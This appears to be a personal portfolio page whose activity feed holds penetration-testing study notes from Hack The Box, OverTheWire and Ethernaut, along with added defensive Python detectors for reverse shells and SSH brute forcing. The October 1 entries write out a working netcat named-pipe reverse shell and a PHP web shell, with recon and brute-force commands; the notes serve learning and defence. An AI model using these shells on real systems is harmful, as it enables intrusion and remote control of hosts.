Tim McHale

Currently learning penetration testing, and going deeper into how the browser works.

Code should be concise, while changes in state should have simple, clear workflows.

Copy of my resume

My X account

What I'm doing


• October 13, 2024
  • push was made to main in the hacking repo
• October 13, 2024
  • push was made to main in the hacking repo
• October 12, 2024
  • push was made to main in the hacking repo
• October 11, 2024
  • push was made to main in the hacking repo
• October 10, 2024
  • push was made to main in the hacking repo
• October 9, 2024
  • push was made to main in the hacking repo
• October 8, 2024
  • push was made to main in the hacking repo
• October 8, 2024
  • push was made to main in the hacking repo
• October 7, 2024
  • push was made to main in the hacking repo
• October 6, 2024
  • push was made to main in the hacking repo
• October 6, 2024
  • push was made to main in the hacking repo
• October 5, 2024
  • push was made to main in the hacking repo
• October 3, 2024
  • push was made to main in the hacking repo
• October 1, 2024

  I disliked some of my notes yesterday regarding reverse shells on a target machine.

  I hope these notes are clearer, as getting a shell from a target back to the attacking box is a critical skill.

  On the target machine we run a bash command that connects back to the attacking box and wires an interactive shell to that connection through a named pipe:

  rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc {ip attacking box} {attacking port} > /tmp/f

  And on our host machine (the attacking box) we listen for that connection first; the port number must be the same on both sides:

  nc -nlvp {attacking port}

  • commit was made to main in the tim-s-gatsby-app repo
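From the defender's side, the named-pipe shell above leaves a distinctive footprint in the process table, and that is what a host check can key on. The following is an added example (not code from the original post): it runs a few heuristics over a constructed process listing of the kind `ps -o pid,ppid,args` and `ls -l /proc/<pid>/fd` would give, flags the interactive shell whose stdin is a pipe and the network process whose stdout is a FIFO, and also catches the simpler variant where the shell's own stdio is a socket. Process ids, the FIFO path and the 198.51.100.7 address are all constructed sample values.

```python
"""Heuristic check for a FIFO-backed reverse shell in a process table.

Added example, not from the original post. The one-liner above leaves a
recognisable trace under /proc/<pid>/fd: an interactive shell whose stdin is a
pipe rather than a terminal, and a network-connected process whose stdout is a
named pipe in /tmp. The process table below is a constructed sample so the
check runs offline; on a live host the same fields come from
`ps -o pid,ppid,args` and `ls -l /proc/<pid>/fd`.
"""

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

# Constructed sample: (pid, ppid, command line, {fd number: link target}).
SAMPLE_PROCS = [
    (1201, 1, "sshd: alice [priv]", {0: "/dev/null", 1: "/dev/null", 2: "/dev/null"}),
    (1340, 1201, "-bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    # the three processes of: cat /tmp/f | /bin/bash -i 2>&1 | nc HOST PORT > /tmp/f
    (2210, 1340, "cat /tmp/f", {0: "/tmp/f", 1: "pipe:[44120]", 2: "/dev/pts/0"}),
    (2211, 1340, "/bin/bash -i", {0: "pipe:[44120]", 1: "pipe:[44121]", 2: "pipe:[44121]"}),
    (2212, 1340, "nc 198.51.100.7 4444",
     {0: "pipe:[44121]", 1: "/tmp/f", 2: "/dev/pts/0", 3: "socket:[55042]"}),
    # a legitimate network service: socket on fd 3, log file on stdout, nothing to flag
    (2300, 1, "python3 app.py",
     {0: "/dev/null", 1: "/var/log/app.log", 2: "/var/log/app.log", 3: "socket:[55001]"}),
    # the simpler variant where the shell's own stdio is the socket
    (2400, 1, "bash -i", {0: "socket:[55100]", 1: "socket:[55100]", 2: "socket:[55100]"}),
]
# Constructed: named pipes present on the host, as `find / -type p` would list them.
SAMPLE_FIFOS = {"/tmp/f"}


def program_name(cmdline):
    """'/bin/bash -i' -> 'bash'; login shells appear as '-bash'."""
    return cmdline.split()[0].lstrip("-").rsplit("/", 1)[-1]


def is_socket(target):
    return target.startswith("socket:[")


def is_terminal(target):
    return target.startswith("/dev/pts/") or target.startswith("/dev/tty")


def find_reverse_shells(procs, fifos):
    """Return [(pid, reason)] for processes matching a reverse-shell pattern."""
    findings = []
    for pid, _ppid, cmdline, fds in procs:
        stdio = [fds.get(n, "") for n in (0, 1, 2)]
        name = program_name(cmdline)
        if name in SHELLS and any(is_socket(t) for t in stdio):
            findings.append((pid, "shell with a socket as stdin/stdout/stderr"))
        elif name in SHELLS and " -i" in cmdline and not is_terminal(stdio[0]):
            findings.append((pid, "interactive shell reading from a pipe, not a terminal"))
        elif any(is_socket(t) for t in fds.values()) and (stdio[0] in fifos or stdio[1] in fifos):
            findings.append((pid, "network-connected process bridged to a named pipe"))
    return findings


if __name__ == "__main__":
    for pid, reason in find_reverse_shells(SAMPLE_PROCS, SAMPLE_FIFOS):
        print(f"pid {pid}: {reason}")
```

The three rules are deliberately narrow: a shell started with `-i` but not attached to a terminal is rare in normal operation, and a process that both holds a socket and reads or writes a FIFO in a world-writable directory is rarer still, so the check stays quiet on the ordinary network service in the sample.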
• October 1, 2024
  • push was made to main in the hacking repo
• October 1, 2024

  I was able to finish Hack The Box's Academy: 28 modules and about 2 months' worth of videos, trainings, and questions based on real-life hacking scenarios.

  Some of the commands I found myself using were:

  Adding to the hosts file. The /etc/hosts file maps a hostname to an IP address, so a target's hostname resolves without DNS:

  echo "{target_ip} ignition.htb" | sudo tee -a /etc/hosts

  Nmap. The --min-rate flag sets a floor on the number of packets per second nmap sends, so a higher number makes the scan faster (and noisier); -p- scans all ports and -sV detects service versions:

  nmap -p- --min-rate=1000 -sV {target_ip}

  Nmap with script scanning and version detection, one of the more intrusive nmap scans, with a high probability of being detected. It produces readable, verbose output. Use it as a first scan if you are unconcerned with detection:

  sudo nmap -sC -sV {target_ip}

  Gobuster, to brute-force a web app's directory structure:

  sudo gobuster dir -w /usr/share/wordlists/common.txt -u {target ip}

  A collection of wordlists for gobuster brute-force attacks:

  git clone https://github.com/danielmiessler/SecLists.git

  RDP into a Windows host:

  xfreerdp /v:{target ip} /u:Administrator

  List SMB shares:

  smbclient -L {target ip}

  Log in to an SMB share:

  smbclient \\\\{target ip}\\share

  PHP: if we can upload the following PHP file to a web app,

  <?php system($_GET["cmd"]); ?>

  and the web app responds to this request with the output of the OS command id,

  http://{ip address or dns name}/shell.php?cmd=id

  then we know the upload gives us command execution, and we can upload a reverse shell via the web app.

  • commit was made to main in the tim-s-gatsby-app repo
• September 25, 2024
  • push was made to main in the hacking repo
• September 19, 2024

  Today I pushed some notes from my work on https://academy.hackthebox.com/. I've been diving deeper into cybersecurity and found their educational material to be excellent. My goal is to get certified on their CPTS (Certified Penetration Testing Specialist) exam, which I am preparing for now. I'm going to use Hack The Box's educational material to sharpen my skills and take a shot at Offensive Security's OSCP certification, which seems to be the standard in the industry for early professionals in cybersecurity.

  A few tools I find myself using:

  nmap -sV [ip address]

  I use nmap for port scanning and reconnaissance to survey a target. Nmap has a large number of flags and options, but the -sV flag gets the service and version running on open ports.

  The Metasploit framework offers a command line interface (as well as a GUI) with a library of exploit modules for known vulnerabilities.

  If we get the right information from our recon, and there is a vulnerability in that version of the machine or service, we can attack it directly.

  Gobuster is a command line tool used for brute forcing directories, subdomains, and vhosts. It uses a wordlist to attempt to find the directory structure of a web app.

  Hydra is a command line tool we can use to brute force ssh.

  • commit was made to main in the tim-s-gatsby-app repo
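A Hydra run against sshd is loud in the server's auth log, which is what a detection can count on. The following is an added example (not code from the original post): it parses constructed lines in the format sshd writes to /var/log/auth.log, counts "Failed password" records per source address inside a sliding time window, flags sources that cross a threshold, and records whether a later successful login came from a flagged source. The hostnames, pids, user names and the 198.51.100.23 / 203.0.113.8 addresses are constructed sample values; the year is assumed, since syslog timestamps carry none.

```python
"""Flag SSH password brute forcing from sshd log lines.

Added example, not from the original post. A tool like Hydra produces a burst
of "Failed password" records from one source address; counting failures per
source inside a sliding time window separates that from a user mistyping a
password twice. The log lines are constructed samples in the default syslog
format sshd writes to /var/log/auth.log.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)

# Constructed sample log. Syslog timestamps carry no year; 2024 is assumed below.
SAMPLE_LOG = """\
Oct 13 09:14:01 host sshd[2210]: Failed password for invalid user admin from 198.51.100.23 port 51122 ssh2
Oct 13 09:14:01 host sshd[2212]: Failed password for root from 198.51.100.23 port 51124 ssh2
Oct 13 09:14:02 host sshd[2214]: Failed password for invalid user test from 198.51.100.23 port 51126 ssh2
Oct 13 09:14:02 host sshd[2216]: Failed password for root from 198.51.100.23 port 51128 ssh2
Oct 13 09:14:03 host sshd[2218]: Failed password for tim from 198.51.100.23 port 51130 ssh2
Oct 13 09:14:03 host sshd[2220]: Failed password for tim from 198.51.100.23 port 51132 ssh2
Oct 13 09:14:04 host sshd[2222]: Accepted password for tim from 198.51.100.23 port 51134 ssh2
Oct 13 09:30:10 host sshd[2300]: Failed password for alice from 203.0.113.8 port 40002 ssh2
Oct 13 09:35:41 host sshd[2305]: Failed password for alice from 203.0.113.8 port 40010 ssh2
Oct 13 09:35:50 host sshd[2307]: Accepted password for alice from 203.0.113.8 port 40012 ssh2
Oct 13 09:36:00 host sshd[2310]: pam_unix(sshd:session): session opened for user alice
"""


def parse_line(line, year=2024):
    """Return (timestamp, result, user, ip), or None for lines that are not auth results."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Return {ip: {"failures", "users", "success_after"}} for sources that reach
    `threshold` failures inside any `window_s`-second span. success_after records a
    successful login from that source after it was flagged: the highest-priority case."""
    stats = defaultdict(lambda: {"failures": 0, "users": set(), "success_after": False})
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    flagged = set()
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        if result == "Failed":
            stats[ip]["failures"] += 1
            stats[ip]["users"].add(user)
            window = recent[ip]
            window.append(ts)
            while (ts - window[0]).total_seconds() > window_s:
                window.popleft()
            if len(window) >= threshold:
                flagged.add(ip)
        elif ip in flagged:
            stats[ip]["success_after"] = True
    return {ip: stats[ip] for ip in flagged}


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, info["failures"], "failures, users:", sorted(info["users"]),
              "login after flag:", info["success_after"])
```

Two signals in the output matter more than the raw count: a spread of user names from one address (password spraying rather than a forgotten password), and a success following the burst, which is the case that needs a human immediately. A user who mistypes twice in five minutes, as 203.0.113.8 does in the sample, never reaches the threshold.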
• September 19, 2024
  • push was made to main in the hacking repo
• September 13, 2024
  • push was made to main in the hacking repo
• September 13, 2024
  • push was made to main in the hacking repo
• September 13, 2024
  • push was made to main in the hacking repo
• September 2, 2024
  • push was made to main in the hacking repo
• September 2, 2024
  • push was made to main in the hacking repo
• September 1, 2024
  • push was made to main in the hacking repo
• September 1, 2024
  • push was made to main in the hacking repo
• September 1, 2024
  • push was made to main in the hacking repo
• September 1, 2024
  • push was made to main in the hacking repo
• September 1, 2024
  • push was made to main in the hacking repo
• September 1, 2024
  • push was made to main in the hacking repo
• September 1, 2024
  • OverTheWire - Pentesting Notes

    Shook the rust off Visual Studio Code and was surprised to find a well-documented directory with a Dockerfile and a docker-compose file running Kali Linux, plus a dozen or so shell scripts for a wargame called Bandit.

    The wargame is from a site called OverTheWire, which offers free wargames to practice pentesting skills: https://overthewire.org/wargames/bandit/

    Each level of the Bandit wargame has you break into a Linux virtual machine: the previous level's task guides you to a password, which you need to log in to the next level's virtual machine.

    This summer I took some classes in Calculus and Physics, and this was a good way of stretching my command line and scripting skills for upcoming interviews.

    A summary of some of the commands I used:

    • sshpass - automates the process of ssh'ing into a VM, and allows you to run commands upon logging in
    • grep - searches plaintext
    • find - searches directory trees by name, size, permissions and other expressive options
    • 2>/dev/null - discards error output when you want to throw away the noise
    • cut - extracts text from each line of a file
    • sort - sorts lines from a text file
    • uniq - fed lines from standard input or a file, outputs only unique text
    • strings - extracts printable strings from a binary file
    • base64 - an encoder and decoder, to help transmit data over a network without running into errors
    • tr - translates or deletes characters, useful if you want to implement ROT13 or the Caesar cipher
    • mktemp - creates a temporary folder/file
    • xxd - hexdump or the reverse
    • gzip - compression tool, header is \x1F\x8B\x08
    • bzip2 - compression tool, header is 425a ("BZ"); the next byte gives the version
    • tar - packs files into / unpacks them from an archive
    • scp - copies files over ssh

    The code can be found here -> https://github.com/trmchale1/hacking

  • commit was made to main in the tim-s-gatsby-app repo
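The gzip and bzip2 header bytes in the list above are the whole trick for the Bandit level that hides a password under repeated compression layers: identify each layer from its magic bytes rather than from the file name, then peel it off. The following is an added example (not code from the original post or the linked repository) that does exactly that with Python's standard library, with the tar layer detected by the "ustar" marker at offset 257; the nested blob and its "password" are constructed in memory so the walk runs offline.

```python
"""Identify compression layers by their magic bytes and peel them off.

Added example, not from the original post. The Bandit level that hides a
password under repeated gzip, bzip2 and tar layers is solved by reading each
header rather than trusting file names: 1f 8b 08 for gzip, 42 5a ("BZ") plus a
version byte for bzip2, and "ustar" at offset 257 for tar. The nested blob is
built in memory here so the walk runs offline.
"""
import bz2
import gzip
import io
import tarfile

MAGIC = [
    (b"\x1f\x8b\x08", "gzip"),   # ID1 ID2, then CM=8 (deflate)
    (b"BZh", "bzip2"),           # 42 5a, then 'h' for the Huffman (current) format
]


def identify(data):
    """Name the outermost container of data, or 'data' if none is recognised."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    if len(data) >= 262 and data[257:262] == b"ustar":
        return "tar"
    return "data"


def peel(data, max_layers=32):
    """Strip recognised layers until plain data remains; return (layer names, payload).

    max_layers bounds the loop so a crafted input cannot keep us decompressing forever."""
    layers = []
    while len(layers) < max_layers:
        kind = identify(data)
        if kind == "gzip":
            data = gzip.decompress(data)
        elif kind == "bzip2":
            data = bz2.decompress(data)
        elif kind == "tar":
            with tarfile.open(fileobj=io.BytesIO(data)) as archive:
                files = [m for m in archive.getmembers() if m.isfile()]
                data = archive.extractfile(files[0]).read()
        else:
            break
        layers.append(kind)
    return layers, data


def build_sample(secret):
    """Constructed fixture: secret -> gzip -> tar -> bzip2 -> gzip, like a Bandit data file."""
    blob = gzip.compress(secret)
    tar_buf = io.BytesIO()
    with tarfile.open(fileobj=tar_buf, mode="w") as archive:
        info = tarfile.TarInfo(name="data2.bin")
        info.size = len(blob)
        archive.addfile(info, io.BytesIO(blob))
    return gzip.compress(bz2.compress(tar_buf.getvalue()))


if __name__ == "__main__":
    layers, payload = peel(build_sample(b"constructed-password\n"))
    print(" -> ".join(layers), "->", payload)
```

The same `identify` function is what `file` does internally; writing it out makes it clear why renaming data.gz to data.txt changes nothing, and why a decompression loop should have an upper bound on the number of layers it is willing to unpack.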
• August 31, 2024
  • push was made to main in the hacking repo
• August 31, 2024
  • push was made to main in the hacking repo
• August 31, 2024
  • push was made to main in the hacking repo
• March 24, 2024
  • git reset --hard

    Today I ran a command I use rarely, and one that in a workplace environment would be a pretty big deal.

    git reset --hard 6894f6e1...

    Like an artist, you have to look at your work and realize that some of it is utter junk and needs to be thrown out. Bad code smells.

    It smells like 1000+ lines of code changes, with changes to configs that indicate potential dependency conflicts.

    In this case I wanted to integrate RainbowKit into my personal website timmchale.co; the CSS in this new download clashed with my current CSS and post-processing.

    I spent several days debugging dependency issues and deleting core functionality of the Gatsby app that I started with.

    Now I am realizing I built my web app with Gatsby, which was fine for a one-page app with simple HTML-like functionality, but I need to go with Next.js for improved routing functionality.

    Keeping code small, with simple workflows, consistently works for me. Any time I put too much functionality together, things tend to break.

    I used git reset because I wanted to change where HEAD was pointing; this command rewrites previous history, going back in time, so to speak.

    I felt I needed to use reset because the branch I started the dev work in had already been merged, with a long history, into the main branch, and I wanted that history removed as well.

    In most cases, when correcting the mistake of just one commit, you want the git revert command instead; GitHub's user interface has a good revert feature in the pull request tab.

  • commit was made to main in the tim-s-gatsby-app repo
• March 24, 2024
  • force_push was made to master in the tim-s-gatsby-app repo
• March 23, 2024
  • pr_merge was made to master in the tim-s-gatsby-app repo
• March 21, 2024
  • branch_creation was made to rainbowkit-manual-integration in the tim-s-gatsby-app repo
• March 18, 2024
  • pr_merge was made to master in the tim-s-gatsby-app repo
• March 18, 2024
  • pr_merge was made to master in the tim-s-gatsby-app repo
• March 18, 2024
  • branch_creation was made to merge-rainbow-kit-react-app in the tim-s-gatsby-app repo
• March 4, 2024
  • timmchale.co is now live

    This is a link to the first release of timmchale.co:

    https://github.com/trmchale1/tim-s-gatsby-app/releases/tag/v1.0.0

    This is a link to my website:

    timmchale.co

  • commit was made to main in the tim-s-gatsby-app repo
• February 21, 2024
  • Smart Contract Audit Ethernaut: Fallout

    The constructor is written in the old name-matching style and is misspelled (Fal1out instead of Fallout), so the compiler treats it as an ordinary public function: anyone can call it and change the ownership of the contract:

    contract.Fal1out()

  • commit was made to main in the tim-s-gatsby-app repo
• February 20, 2024
  • Smart Contract Audit Ethernaut: Fallback

    In this game the player must become the owner, then withdraw the full balance of the contract.

    The key part is the receive() function: if the contract receives a value greater than 0 and the sender's contributions are also greater than zero, then the sender becomes the owner.

    We contribute a small sum from the player's account, so our contribution is non-zero:

    await contract.contribute.sendTransaction({ from: player, value: toWei('0.0009')})

    We send a small sum directly to the contract, which triggers receive():

    await sendTransaction({from: player, to: contract.address, value: toWei('0.000001')})

    Check we own the contract:

    await contract.owner()

    Then withdraw the loot:

    await contract.withdraw()

  • commit was made to main in the tim-s-gatsby-app repo